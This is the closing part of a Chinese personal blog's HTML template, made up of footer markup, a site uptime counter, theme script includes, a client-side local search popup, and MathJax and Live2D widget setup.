      // icon: 'ℬ'
      icon: '❡'
    };
    anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
  });
</script>
<style>
  /* place left on bigger screen */
  @media all and (min-width: 800px) {
    .anchorjs-link {
      position: absolute;
      left: -0.75em;
      font-size: 1.1em;
      margin-top: -0.1em;
    }
  }
</style>

<!-- anchorjs end -->



		<!-- Footer (contains ThemeColor、viewer) -->
		<!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center">
          

          
            <li>
              <a target="_blank" href="https://github.com/Morouu">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          

          

          

          

          

        </ul>
        <p class="copyright text-muted">
         &copy; 2021
		 <i class="icon-smile"></i>
          morouu
          <br>
          Theme by
          <a target="_blank" rel="noopener" href="http://beantech.org">BeanTech</a>
          <span style="display: inline-block; margin: 0 5px;">
            <i class="fa fa-heart"></i>
          </span>
          re-Ported by
          <a target="_blank" rel="noopener" href="https://v-vincen.life/">Live My Life</a>
          |
          <iframe style="margin-left: 2px; margin-bottom:-5px;" frameborder="0" scrolling="0" width="91px" height="20px" src="https://ghbtns.com/github-btn.html?user=V-Vincen&repo=V-Vincen.github.io&type=star&count=true"></iframe>
        <div class=" copyright text-muted live_time"><span>本博客已萌萌哒地运行</span><span id="display_live_time"> 0 天 0 小时 0 分 0 秒</span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-12-27T20:23:15');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div>
		</p>
		
      </div>
    </div>
  </div>
</footer>

<a id="rocket" href="#top" class=""></a>


  <!-- jQuery -->
  <script type="text/javascript" src="/js/jquery.min.js"></script>
  <!-- Bootstrap Core JavaScript -->
  <script type="text/javascript" src="/js/bootstrap.min.js"></script>
  <!-- Custom Theme JavaScript -->
  <script type="text/javascript" src="/js/hux-blog.min.js"></script>
  <!-- catalog -->
  <script async="true" type="text/javascript" src="/js/catalog.js"></script>
  <!-- totop(rocket) -->
  <script async="true" type="text/javascript" src="/js/totop.js"></script>

  
    <!-- Busuanzi JavaScript -->
    <script async="async" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  
    <!-- Scroll start -->
    <script async="async" type="text/javascript" src="/js/scroll.js"></script>
    <!-- Scroll end -->
  

  
    <!-- LangSelect start -->
    <script type="text/javascript" src="/js/langselect.js"></script>
    <!-- LangSelect end -->
  

  
    <!-- Mouseclick -->
    <script type="text/javascript" src="/js/mouseclick.js" content='' color=''></script>
  

  
    <!-- ribbon -->
    <script type="text/javascript" src="/js/ribbonDynamic.js"></script>
  

  
    <!-- Line start -->
    <script async="text/javascript" src="/js/line.js"></script>
    <!-- Line end -->
  






  <!-- viewer start -->
  <!-- viewer start (Picture preview) -->
  
    <script async="async" type="text/javascript" src="/js/viewer/viewer.min.js"></script>
    <script async="async" type="text/javascript" src="/js/viewer/pic-viewer.js"></script>
  

  <!-- viewer end -->


<script>
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function (e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  }

  // fastClick.js
  async ("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function () {
    var $nav = document.querySelector("nav");
    if ($nav)
      FastClick.attach($nav);
    }
  )
</script>

<!-- Because of the native support for backtick-style fenced code blocks right within the Markdown is landed in Github Pages, From V1.6, There is no need for Highlight.js, so Huxblog drops it officially. -
https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0 - https://help.github.com/articles/creating-and-highlighting-code-blocks/ -->
<!-- <script> async ("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function () { hljs.initHighlightingOnLoad(); }) </script> <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet"> -->

<!-- jquery.tagcloud.js -->
<!-- <script> // only load tagcloud.js in tag.html if ($('#tag_cloud').length !== 0) { async ("https://morblog.cc/js/jquery.tagcloud.js", function () { $.fn.tagcloud.defaults = { // size: { start: 1, end: 1, unit: 'em' }, color: {
start: '#bbbbee', end: '#0085a1' } }; $('#tag_cloud a').tagcloud(); }) } </script> -->


		<!-- Search -->
		
		<div class="popup search-popup local-search-popup">
  <span class="popup-btn-close">
    ESC
  </span>
  <div class="container">
    <div class="row">
      <!-- <div class="col-md-9 col-md-offset-1"> -->
      <div class="col-lg-9 col-lg-offset-1 col-md-10 col-md-offset-1 local-search-content">

        <div class="local-search-header clearfix">

          <div class="local-search-input-wrapper">
            <span class="search-icon">
              <i class="fa fa-search fa-lg" style="margin: 25px 10px 25px 20px;"></i>
            </span>
            <input autocomplete="off" placeholder="搜索..." type="text" id="local-search-input">
          </div>
        </div>
        <div id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>


  
    <script src="/js/ziploader.js"></script>
  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.json";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    // monitor main search box;
    var onPopupClose = function (e) {
      $('.popup').fadeOut(300);
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $('.popup').fadeIn(300);
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }
    // get search zip version
    $.get('/searchVersion.json?t=' + (+new Date()), function (res) {
      if (localStorage.getItem('searchVersion') !== res) {
        localStorage.setItem('searchVersion', res);
        initSearchJson();
      }
    });

    function initSearchJson() {
      initLoad(['/search.flv'], {
        loadOptions: {
          success: function (obj) {
            localStorage.setItem('searchJson', obj['search.json'])
          },
          error: function (e) {
            return console.log(e)
          }
        },
        returnOptions: {
          'json': TYPE_TEXT
        },
        mimeOptions: {
          'json': 'application/json'
        }
      })
    }
    // search function;
    var searchFunc = function (search_id, content_id) {
      'use strict';
      isfetched = true;
      var datas = JSON.parse(localStorage.getItem('searchJson'));
      // console.log(search_id)
      var input = document.getElementById(search_id);
      var resultContent = document.getElementById(content_id);
      var inputEventFunction = function () {
        var searchText = input.value.trim().toLowerCase();
        var keywords = searchText.split(/[\s\-]+/);
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        var resultItems = [];
        if (searchText.length > 0) {
          // perform local searching
          datas.forEach(function (data) {
            var isMatch = false;
            var hitCount = 0;
            var searchTextCount = 0;
            var title = data.title
              ? data.title.trim()
              : '';
            var titleInLowerCase = title.toLowerCase();
            var content = data.content
              ? data.content.trim().replace(/<[^>]+>/g, "")
              : '';
            var contentInLowerCase = content.toLowerCase();
            var articleUrl = decodeURIComponent(data.url);

            var date = data.date;
            var dateTime = date.replace(/T/, " ").replace(/.000Z/, "");
            var imgUrl = data.header_img;
            


            var indexOfTitle = [];
            var indexOfContent = [];
            // only match articles with not empty titles
            keywords.forEach(function (keyword) {
              function getIndexByWord(word, text, caseSensitive) {
                var wordLen = word.length;
                if (wordLen === 0) {
                  return [];
                }
                var startPosition = 0,
                  position = [],
                  index = [];
                if (!caseSensitive) {
                  text = text.toLowerCase();
                  word = word.toLowerCase();
                }
                while ((position = text.indexOf(word, startPosition)) > -1) {
                  index.push({position: position, word: word});
                  startPosition = position + wordLen;
                }
                return index;
              }
              indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
              indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
            });
            if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
              isMatch = true;
              hitCount = indexOfTitle.length + indexOfContent.length;
            }
            // show search results
            if (isMatch) {
              // sort index by position of keyword
              [indexOfTitle, indexOfContent].forEach(function (index) {
                index.sort(function (itemLeft, itemRight) {
                  if (itemRight.position !== itemLeft.position) {
                    return itemRight.position - itemLeft.position;
                  } else {
                    return itemLeft.word.length - itemRight.word.length;
                  }
                });
              });
              // merge hits into slices
              function mergeIntoSlice(text, start, end, index) {
                var item = index[index.length - 1];
                var position = item.position;
                var word = item.word;
                var hits = [];
                var searchTextCountInSlice = 0;
                while (position + word.length <= end && index.length != 0) {
                  if (word === searchText) {
                    searchTextCountInSlice++;
                  }
                  hits.push({position: position, length: word.length});
                  var wordEnd = position + word.length;
                  // move to next position of hit
                  index.pop();
                  while (index.length != 0) {
                    item = index[index.length - 1];
                    position = item.position;
                    word = item.word;
                    if (wordEnd > position) {
                      index.pop();
                    } else {
                      break;
                    }
                  }
                }
                searchTextCount += searchTextCountInSlice;
                return {hits: hits, start: start, end: end, searchTextCount: searchTextCountInSlice};
              }
              var slicesOfTitle = [];
              if (indexOfTitle.length != 0) {
                slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
              }
              var slicesOfContent = [];
              while (indexOfContent.length != 0) {
                var item = indexOfContent[indexOfContent.length - 1];
                var position = item.position;
                var word = item.word;
                // cut out 100 characters
                var start = position - 20;
                var end = position + 80;
                if (start < 0) {
                  start = 0;
                }
                if (end < position + word.length) {
                  end = position + word.length;
                }
                if (end > content.length) {
                  end = content.length;
                }
                slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
              }
              // sort slices in content by search text's count and hits' count
              slicesOfContent.sort(function (sliceLeft, sliceRight) {
                if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                  return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                  return sliceRight.hits.length - sliceLeft.hits.length;
                } else {
                  return sliceLeft.start - sliceRight.start;
                }
              });
              // select top N slices in content
              var upperBound = parseInt('1');
              if (upperBound >= 0) {
                slicesOfContent = slicesOfContent.slice(0, upperBound);
              }
              // highlight title and content
              function highlightKeyword(text, slice) {
                var result = '';
                var prevEnd = slice.start;
                slice.hits.forEach(function (hit) {
                  result += text.substring(prevEnd, hit.position);
                  var end = hit.position + hit.length;
                  result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                  prevEnd = end;
                });
                result += text.substring(prevEnd, slice.end);
                return result;
              }
              var resultItem = '';

              // if (slicesOfTitle.length != 0) {   resultItem += "<li><a target='_blank' href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>"; } else {   resultItem += "<li><a target='_blank' href='" +
              // articleUrl + "' class='search-result-title'>" + title + "</a>"; } slicesOfContent.forEach(function (slice) {   resultItem += "<a target='_blank' href='" + articleUrl + "'><p class=\"search-result\">" + highlightKeyword(content, slice) +
              // "...</p></a>"; }); resultItem += "</li>";

              if (slicesOfTitle.length != 0) {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</div><time class='search-result-date'>" + dateTime + "</time>";
              } else {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + title + "</div><time class='search-result-date'>" + dateTime + "</time>";
              }
              slicesOfContent.forEach(function (slice) {
                resultItem += "<p class=\"search-result-content\">" + highlightKeyword(content, slice) + "...</p>";
              });
              resultItem += "</div><div class='search-result-right'><img class='media-image' src='" + imgUrl + "' width='64px' height='48px'></img></div></a>";

              resultItems.push({item: resultItem, searchTextCount: searchTextCount, hitCount: hitCount, id: resultItems.length});
            }
          })
        };

        if (keywords.length === 1 && keywords[0] === "") {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else if (resultItems.length === 0) {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else {
          resultItems.sort(function (resultLeft, resultRight) {
            if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
              return resultRight.searchTextCount - resultLeft.searchTextCount;
            } else if (resultLeft.hitCount !== resultRight.hitCount) {
              return resultRight.hitCount - resultLeft.hitCount;
            } else {
              return resultRight.id - resultLeft.id;
            }
          });
          var searchResultList = '<div class=\"search-result-list\">';
          resultItems.forEach(function (result) {
            searchResultList += result.item;
          })
          searchResultList += "</div>";
          resultContent.innerHTML = searchResultList;
        }
      }
      if ('auto' === 'auto') {
        input.addEventListener('input', inputEventFunction);
      } else {
        $('.search-icon').click(inputEventFunction);
        input.addEventListener('keypress', function (event) {
          if (event.keyCode === 13) {
            inputEventFunction();
          }
        });
      }
      // remove loading animation
      $('body').css('overflow', '');
      proceedsearch();
    }
    // handle and trigger popup window;
    $('.popup-trigger').click(function (e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc('local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });
    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function (e) {
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 && $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });

    document.addEventListener('mouseup', (e) => {
      var _con = document.querySelector(".local-search-content");
      if (_con) {
        if (!_con.contains(e.target)) {
          onPopupClose();
        }
      }
    });
  </script>


		
	<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/haru02.model.json"},"display":{"position":"right","width":225,"height":225,"right":125},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
